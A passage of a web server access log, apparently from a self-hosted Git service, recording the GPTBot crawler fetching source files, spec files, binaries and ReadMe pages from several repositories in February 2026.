200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/README.md" -[17/Feb/2026:16:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:16:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll?display=rendered" [Client 74.7.227.38] [Length 10857] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" -[17/Feb/2026:16:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" -[17/Feb/2026:16:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10799] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" -[17/Feb/2026:16:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12126] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 10807] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" -[17/Feb/2026:16:21:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 20073] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:16:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py?display=source" [Client 74.7.227.38] [Length 20104] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:16:21:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:16:21:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service?display=source" [Client 74.7.227.38] [Length 12393] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog.service" -[17/Feb/2026:16:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12173] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:16:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12529] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 10807] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" -[17/Feb/2026:16:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 83218] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:16:21:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:21:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt?display=source" [Client 74.7.227.38] [Length 11104] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" -[17/Feb/2026:16:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe?display=rendered" [Client 74.7.227.38] [Length 10818] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10766] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" -[17/Feb/2026:16:21:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:21:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.spec" -[17/Feb/2026:16:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:16:21:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe?display=rendered" [Client 74.7.227.38] [Length 10846] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/chromedriver.exe" -[17/Feb/2026:16:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16561] [Gzip 5.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" -[17/Feb/2026:16:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" -[17/Feb/2026:16:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip?display=rendered" [Client 74.7.227.38] [Length 10858] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" -[17/Feb/2026:16:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16207] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/watchdog.py" -[17/Feb/2026:16:21:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe" -[17/Feb/2026:16:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py?display=source" [Client 74.7.227.38] [Length 16978] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:16:21:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll?display=rendered" [Client 74.7.227.38] [Length 10829] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libpq.dll" -[17/Feb/2026:16:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:16:21:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico?display=rendered" [Client 74.7.227.38] [Length 10825] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" -[17/Feb/2026:16:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.py" -[17/Feb/2026:16:21:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 12125] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt?display=source" [Client 74.7.227.38] [Length 11989] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:16:21:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:21:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor0.py" -[17/Feb/2026:16:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md?display=rendered" [Client 74.7.227.38] [Length 83180] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:16:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec?display=rendered" [Client 74.7.227.38] [Length 10888] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor.spec" -[17/Feb/2026:16:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16207] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" -[17/Feb/2026:16:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec?display=source" [Client 74.7.227.38] [Length 12205] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:16:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:16:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 74.7.227.38] [Length 15325] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" -[17/Feb/2026:16:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 41138] [Gzip 9.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" -[17/Feb/2026:16:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/package.json?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/package.json" -[17/Feb/2026:16:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 24147] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" -[17/Feb/2026:16:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=closestduedate&state=open" -[17/Feb/2026:16:21:39 +0000] - 200 200 - GET https 